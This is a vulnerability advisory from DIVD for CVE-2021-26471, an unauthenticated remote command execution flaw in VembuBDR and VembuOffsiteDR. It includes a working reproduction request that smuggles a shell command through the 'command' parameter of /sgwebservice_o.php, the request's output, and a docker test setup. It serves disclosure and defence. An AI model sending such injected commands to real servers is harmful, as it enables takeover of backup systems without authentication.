CVE-2021-26471 - Unauthenticated remote command execution in Vembu products

CVE CVE-2021-26471
Case DIVD-2020-00011
Discovered by
Credits
Products VembuBDR:
  • VembuBDR
  • VembuOffsiteDR
Versions VembuBDR:
  • VembuBDR
    • 4.2.x (= 4.2.0.1)
    • 4.2.x (= 4.2.0)
    • 4.1.x (= 4.1.0)
    • 4.0.x (= 4.0.2)
    • 4.0.x (= 4.0.1)
    • 4.0.x (= 4.0.0)
    • 3.9.x (= 3.9.1 Update1)
    • 3.9.x (= 3.9.0 Update1)
    • 3.9.x (= 3.9.0)
    • 3.8.x (= 3.8.0)
    • 3.7.x (= 3.7.0)
    • 3.5.x (= 3.5.0.0)
  • VembuOffsiteDR
    • 4.2.0.1
    • 4.2.0
Page author Frank Breedijk
CVSS Base score: 9.8
References
Last modified 20 Jun 2022 09:35

Description

In VembuBDR before 4.2.0.1 and VembuOffsiteDR before 4.2.0.1, the http API located at /sgwebservice_o.php accepts a command argument. Using this command argument an unauthenticated attacker can execute arbitrary shell commands.

How to reproduce

Step 1:Start up a docker environment (see below)

Step 2: In a different terminal run the following command:

> $ curl 'http://127.0.0.1:6060/sgwebservice_o.php?Action=StoreSpecialFolder&command=echo%20hacked%20%3E%2Ftmp%2Fdivd_was_here.txt&tempFile=/tmp'
 
<storegrid><saved messsage='Files filtered and cached successfully.Now You can continue your schedule..' error='0'></saved></storegrid>$

Step 3: validate that a file was written in /tmp:


$ docker exec VembuBDR4201 /bin/bash -c "ls -l /tmp;echo ---;cat /tmp/divd_was_here.txt;echo ---"
total 16
-rw-r--r-- 1 www-data www-data    7 Feb 11 15:00 divd_was_here.txt
drwxr-xr-x 1 root     root     4096 Feb 11 14:52 hsperfdata_root
drwxr-xr-x 1 root     root     4096 Feb 11 14:52 vmware
drwx------ 2 root     root     4096 Jun 12  2020 vmware-root
---
hacked
---
$

Impact

This vulnerability allows an attacker to execute an arbitrary (windows/linux) shell command in the context of the httpd process.

About the docker test environment.

In order to set up the docker test environment, we used the following script:

#!/bin/bash
 
# Network
if [[ $(docker network ls |grep vembu-netowrk |wc -l ) -lt 1 ]]; then
  docker network create --subnet=172.18.0.0/16 vembu-network
fi
 
# Start Database container
mkdir DB
while [[ $(docker ps -a |grep VembuDatabase|wc -l) -ge 1 ]]; do
  docker kill VembuDatabase
  docker rm VembuDatabase
  sleep 1
done
docker run --name VembuDatabase --network vembu-network --ip 172.18.0.2 -p 5432:5432 -d -e POSTGRES_PASSWORD=admin -e POSTGRES_USER=postgres -e POSTGRES_DB=SGDatabase -v  $PWD/DB:/vembu vembubdr/bdr-latest:psql-latest
 
# Wait for database port to open
echo -c "Waiting for database to become available..."
while ! timeout 1 bash -c "echo > /dev/tcp/localhost/5432" ; do 
  echo -c "."
  sleep 1; 
done
echo
 
# Start APP container
mkdir APP
while [[ $(docker ps -a |grep VembuBDR4201|wc -l) -ge 1 ]]; do
  docker kill VembuBDR4201
  docker rm VembuBDR4201
  sleep 1
done
 
docker run --name VembuBDR4201 --network vembu-network --ip 172.18.0.3 --add-host VembuDatabase:172.18.0.2 --privileged=true -i -t -d --device /dev/fuse --privileged -p 6060:6060 -p 32004:32004 -v $PWD/APP:/vembu vembubdr/bdr-latest:vembubdr-4201-u1
 
# Wait for app port to open
echo -c "Waiting for application to become available..."
while ! timeout 1 bash -c "echo > /dev/tcp/localhost/6060" ; do 
  echo -c "."
  sleep 1; 
done
echo

JSON version